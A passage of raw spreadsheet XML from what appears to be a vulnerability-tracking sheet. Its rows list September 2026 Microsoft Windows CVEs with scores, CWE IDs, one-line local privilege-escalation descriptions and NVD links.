t="inlineStr"><is><t>CVE-2026-69779</t></is></c><c r="D976" s="5" t="n"><v>7</v></c><c r="E976" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F976" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G976" s="5" t="inlineStr" /><c r="H976" s="5" t="n"><v>0.002</v></c><c r="I976" s="5" t="inlineStr" /><c r="J976" s="5" t="inlineStr" /><c r="K976" s="5" t="inlineStr" /><c r="L976" s="5" t="inlineStr" /><c r="M976" s="5" t="inlineStr" /><c r="N976" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O976" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P976" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q976" s="5" t="inlineStr" /><c r="R976" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S976" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T976" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69779</t></is></c></row><row r="977"><c r="A977" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B977" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C977" s="5" t="inlineStr"><is><t>CVE-2026-69791</t></is></c><c r="D977" s="5" t="n"><v>7</v></c><c r="E977" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F977" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G977" s="5" t="inlineStr" /><c r="H977" s="5" t="n"><v>0.003</v></c><c r="I977" s="5" t="inlineStr" /><c r="J977" s="5" t="inlineStr" /><c r="K977" s="5" t="inlineStr" /><c r="L977" s="5" t="inlineStr" /><c r="M977" s="5" t="inlineStr" /><c r="N977" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O977" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P977" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q977" s="5" t="inlineStr" /><c r="R977" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S977" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T977" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69791</t></is></c></row><row r="978"><c r="A978" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B978" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C978" s="5" t="inlineStr"><is><t>CVE-2026-69806</t></is></c><c r="D978" s="5" t="n"><v>7</v></c><c r="E978" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F978" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G978" s="5" t="inlineStr" /><c r="H978" s="5" t="n"><v>0.018</v></c><c r="I978" s="5" t="inlineStr" /><c r="J978" s="5" t="inlineStr" /><c r="K978" s="5" t="inlineStr" /><c r="L978" s="5" t="inlineStr" /><c r="M978" s="5" t="inlineStr" /><c r="N978" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O978" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P978" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q978" s="5" t="inlineStr" /><c r="R978" s="5" t="inlineStr"><is><t>CWE-200, CWE-94</t></is></c><c r="S978" s="5" t="inlineStr"><is><t>Exposure of sensitive information to an unauthorized actor in .NET allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T978" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69806</t></is></c></row><row r="979"><c r="A979" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B979" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C979" s="5" t="inlineStr"><is><t>CVE-2026-69814</t></is></c><c r="D979" s="5" t="n"><v>7</v></c><c r="E979" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F979" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G979" s="5" t="inlineStr" /><c r="H979" s="5" t="n"><v>0.003</v></c><c r="I979" s="5" t="inlineStr" /><c r="J979" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K979" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L979" s="5" t="inlineStr" /><c r="M979" s="5" t="inlineStr" /><c r="N979" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O979" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P979" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q979" s="5" t="inlineStr" /><c r="R979" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S979" s="5" t="inlineStr"><is><t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T979" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t></is></c></row><row r="980"><c r="A980" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B980" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C980" s="5" t="inlineStr"><is><t>CVE-2026-69816</t></is></c><c r="D980" s="5" t="n"><v>7</v></c><c r="E980" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F980" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G980" s="5" t="inlineStr" /><c r="H980" s="5" t="n"><v>0.003</v></c><c r="I980" s="5" t="inlineStr" /><c r="J980" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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980" s="5" t="inlineStr" /><c r="M980" s="5" t="inlineStr" /><c r="N980" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O980" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P980" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q980" s="5" t="inlineStr" /><c r="R980" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S980" s="5" t="inlineStr"><is><t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T980" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t></is></c></row><row r="981"><c r="A981" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B981" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C981" s="5" t="inlineStr"><is><t>CVE-2026-69817</t></is></c><c r="D981" s="5" t="n"><v>7</v></c><c r="E981" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F981" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G981" s="5" t="inlineStr" /><c r="H981" s="5" t="n"><v>0.003</v></c><c r="I981" s="5" t="inlineStr" /><c r="J981" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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1" s="5" t="inlineStr" /><c r="M981" s="5" t="inlineStr" /><c r="N981" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O981" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P981" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q981" s="5" t="inlineStr" /><c r="R981" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S981" s="5" t="inlineStr"><is><t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T981" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t></is></c></row><row r="982"><c r="A982" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B982" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C982" s="5" t="inlineStr"><is><t>CVE-2026-69818</t></is></c><c r="D982" s="5" t="n"><v>7</v></c><c r="E982" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F982" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G982" s="5" t="inlineStr" /><c r="H982" s="5" t="n"><v>0.003</v></c><c r="I982" s="5" t="inlineStr" /><c r="J982" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K982" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L982" s="5" t="inlineStr" /><c r="M982" s="5" t="inlineStr" /><c r="N982" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O982" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P982" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q982" s="5" t="inlineStr" /><c r="R982" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S982" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T982" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t></is></c></row><row r="983"><c r="A983" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B983" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C983" s="5" t="inlineStr"><is><t>CVE-2026-69834</t></is></c><c r="D983" s="5" t="n"><v>7</v></c><c r="E983" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F983" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G983" s="5" t="inlineStr" /><c r="H983" s="5" t="n"><v>0.003</v></c><c r="I983" s="5" t="inlineStr" /><c r="J983" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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3" s="5" t="inlineStr" /><c r="M983" s="5" t="inlineStr" /><c r="N983" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O983" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P983" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q983" s="5" t="inlineStr" /><c r="R983" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S983" s="5" t="inlineStr"><is><t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T983" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t></is></c></row><row r="984"><c r="A984" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B984" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C984" s="5" t="inlineStr"><is><t>CVE-2026-69838</t></is></c><c r="D984" s="5" t="n"><v>7</v></c><c r="E984" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F984" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G984" s="5" t="inlineStr" /><c r="H984" s="5" t="n"><v>0.003</v></c><c r="I984" s="5" t="inlineStr" /><c r="J984" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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4" s="5" t="inlineStr" /><c r="M984" s="5" t="inlineStr" /><c r="N984" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O984" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P984" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q984" s="5" t="inlineStr" /><c r="R984" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S984" s="5" t="inlineStr"><is><t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T984" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t></is></c></row><row r="985"><c r="A985" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B985" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C985" s="5" t="inlineStr"><is><t>CVE-2026-69859</t></is></c><c r="D985" s="5" t="n"><v>7</v></c><c r="E985" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F985" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G985" s="5" t="inlineStr" /><c r="H985" s="5" t="n"><v>0.002</v></c><c r="I985" s="5" t="inlineStr" /><c r="J985" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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5" s="5" t="inlineStr" /><c r="M985" s="5" t="inlineStr" /><c r="N985" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O985" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P985" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q985" s="5" t="inlineStr" /><c r="R985" s="5" t="inlineStr"><is><t>CWE-191, CWE-367</t></is></c><c r="S985" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T985" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t></is></c></row><row r="986"><c r="A986" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B986" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C986" s="5" t="inlineStr"><is><t>CVE-2026-69866</t></is></c><c r="D986" s="5" t="n"><v>7</v></c><c r="E986" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F986" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G986" s="5" t="inlineStr" /><c r="H986" s="5" t="n"><v>0.003</v></c><c r="I986" s="5" t="inlineStr" /><c r="J986" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K986"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986" s="5" t="inlineStr" /><c r="M986" s="5" t="inlineStr" /><c r="N986" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O986" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P986" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q986" s="5" t="inlineStr" /><c r="R986" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S986" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T986" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t></is></c></row><row r="987"><c r="A987" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B987" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C987" s="5" t="inlineStr"><is><t>CVE-2026-69889</t></is></c><c r="D987" s="5" t="n"><v>7</v></c><c r="E987" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F987" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G987" s="5" t="inlineStr" /><c r="H987" s="5" t="n"><v>0.003</v></c><c r="I987" s="5" t="inlineStr" /><c r="J987" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K987"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987" s="5" t="inlineStr" /><c r="M987" s="5" t="inlineStr" /><c r="N987" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O987" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P987" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q987" s="5" t="inlineStr" /><c r="R987" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S987" s="5" t="inlineStr"><is><t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T987" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t></is></c></row><row r="988"><c r="A988" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B988" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C988" s="5" t="inlineStr"><is><t>CVE-2026-69891</t></is></c><c r="D988" s="5" t="n"><v>7</v></c><c r="E988" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F988" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G988" s="5" t="inlineStr" /><c r="H988" s="5" t="n"><v>0.003</v></c><c r="I988" s="5" t="inlineStr" /><c r="J988" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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988" s="5" t="inlineStr" /><c r="M988" s="5" t="inlineStr" /><c r="N988" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O988" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P988" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q988" s="5" t="inlineStr" /><c r="R988" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S988" s="5" t="inlineStr"><is><t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T988" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t></is></c></row><row r="989"><c r="A989" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B989" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C989" s="5" t="inlineStr"><is><t>CVE-2026-69896</t></is></c><c r="D989" s="5" t="n"><v>7</v></c><c r="E989" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F989" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G989" s="5" t="inlineStr" /><c r="H989" s="5" t="n"><v>0.003</v></c><c r="I989" s="5" t="inlineStr" /><c r="J989" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K989" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L989" s="5" t="inlineStr" /><c r="M989" s="5" t="inlineStr" /><c r="N989" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O989" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P989" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q989" s="5" t="inlineStr" /><c r="R989" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S989" s="5" t="inlineStr"><is><t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T989" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t></is></c></row><row r="990"><c r="A990" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B990" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C990" s="5" t="inlineStr"><is><t>CVE-2026-69911</t></is></c><c r="D990" s="5" t="n"><v>7</v></c><c r="E990" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F990" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G990" s="5" t="inlineStr" /><c r="H990" s="5" t="n"><v>0.003</v></c><c r="I990" s="5" t="inlineStr" /><c r="J990" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K99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0" s="5" t="inlineStr" /><c r="M990" s="5" t="inlineStr" /><c r="N990" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O990" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P990" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q990" s="5" t="inlineStr" /><c r="R990" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S990" s="5" t="inlineStr"><is><t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T990" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t></is></c></row><row r="991"><c r="A991" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B991" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C991" s="5" t="inlineStr"><is><t>CVE-2026-70283</t></is></c><c r="D991" s="5" t="n"><v>7</v></c><c r="E991" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F991" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G991" s="5" t="inlineStr" /><c r="H991" s="5" t="n"><v>0.002</v></c><c r="I991" s="5" t="inlineStr" /><c r="J991" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K99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1" s="5" t="inlineStr" /><c r="M991" s="5" t="inlineStr" /><c r="N991" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O991" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P991" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q991" s="5" t="inlineStr" /><c r="R991" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S991" s="5" t="inlineStr"><is><t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T991" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t></is></c></row><row r="992"><c r="A992" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B992" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C992" s="5" t="inlineStr"><is><t>CVE-2026-70562</t></is></c><c r="D992" s="5" t="n"><v>7</v></c><c r="E992" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F992" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G992" s="5" t="inlineStr" /><c r="H992" s="5" t="n"><v>0.003</v></c><c r="I992" s="5" t="inlineStr" /><c r="J992" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K99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2" s="5" t="inlineStr" /><c r="M992" s="5" t="inlineStr" /><c r="N992" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O992" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P992" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q992" s="5" t="inlineStr" /><c r="R992" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S992" s="5" t="inlineStr"><is><t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T992" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t></is></c></row><row r="993"><c r="A993" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B993" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C993" s="5" t="inlineStr"><is><t>CVE-2026-70565</t></is></c><c r="D993" s="5" t="n"><v>7</v></c><c r="E993" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F993" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G993" s="5" t="inlineStr" /><c r="H993" s="5" t="n"><v>0.003</v></c><c r="I993" s="5" t="inlineStr" /><c r="J993" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K99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3" s="5" t="inlineStr" /><c r="M993" s="5" t="inlineStr" /><c r="N993" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O993" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P993" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q993" s="5" t="inlineStr" /><c r="R993" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S993" s="5" t="inlineStr"><is><t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T993" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t></is></c></row><row r="994"><c r="A994" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B994" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C994" s="5" t="inlineStr"><is><t>CVE-2026-70567</t></is></c><c r="D994" s="5" t="n"><v>7</v></c><c r="E994" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F994" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G994" s="5" t="inlineStr" /><c r="H994" s="5" t="n"><v>0.003</v></c><c r="I994" s="5" t="inlineStr" /><c r="J994" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K994" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L994" s="5" t="inlineStr" /><c r="M994" s="5" t="inlineStr" /><c r="N994" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O994" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P994" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q994" s="5" t="inlineStr" /><c r="R994" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S994" s="5" t="inlineStr"><is><t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T994" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t></is></c></row><row r="995"><c r="A995" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B995" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C995" s="5" t="inlineStr"><is><t>CVE-2026-70568</t></is></c><c r="D995" s="5" t="n"><v>7</v></c><c r="E995" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F995" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G995" s="5" t="inlineStr" /><c r="H995" s="5" t="n"><v>0.003</v></c><c r="I995" s="5" t="inlineStr" /><c r="J995" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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5" s="5" t="inlineStr" /><c r="M995" s="5" t="inlineStr" /><c r="N995" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O995" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P995" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q995" s="5" t="inlineStr" /><c r="R995" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S995" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T995" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t></is></c></row><row r="996"><c r="A996" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B996" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C996" s="5" t="inlineStr"><is><t>CVE-2026-70573</t></is></c><c r="D996" s="5" t="n"><v>7</v></c><c r="E996" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F996" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G996" s="5" t="inlineStr" /><c r="H996" s="5" t="n"><v>0.003</v></c><c r="I996" s="5" t="inlineStr" /><c r="J996" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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996" s="5" t="inlineStr" /><c r="M996" s="5" t="inlineStr" /><c r="N996" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O996" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P996" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q996" s="5" t="inlineStr" /><c r="R996" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S996" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T996" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t></is></c></row><row r="997"><c r="A997" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B997" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C997" s="5" t="inlineStr"><is><t>CVE-2026-70577</t></is></c><c r="D997" s="5" t="n"><v>7</v></c><c r="E997" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F997" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G997" s="5" t="inlineStr" /><c r="H997" s="5" t="n"><v>0.003</v></c><c r="I997" s="5" t="inlineStr" /><c r="J997" s="5" t="inlineStr" /><c r="K997" s="5" t="inlineStr" /><c r="L997" s="5" t="inlineStr" /><c r="M997" s="5" t="inlineStr" /><c r="N997" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O997" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P997" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q997" s="5" t="inlineStr" /><c r="R997" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S997" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T997" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70577</t></is></c></row><row r="998"><c r="A998" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B998" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C998" s="5" t="inlineStr"><is><t>CVE-2026-70578</t></is></c><c r="D998" s="5" t="n"><v>7</v></c><c r="E998" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F998" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G998" s="5" t="inlineStr" /><c r="H998" s="5" t="n"><v>0.003</v></c><c r="I998" s="5" t="inlineStr" /><c r="J998" s="5" t="inlineStr" /><c r="K998" s="5" t="inlineStr" /><c r="L998" s="5" t="inlineStr" /><c r="M998" s="5" t="inlineStr" /><c r="N998" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O998" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P998" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q998" s="5" t="inlineStr" /><c r="R998" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S998" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T998" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70578</t></is></c></row><row r="999"><c r="A999" s="5" 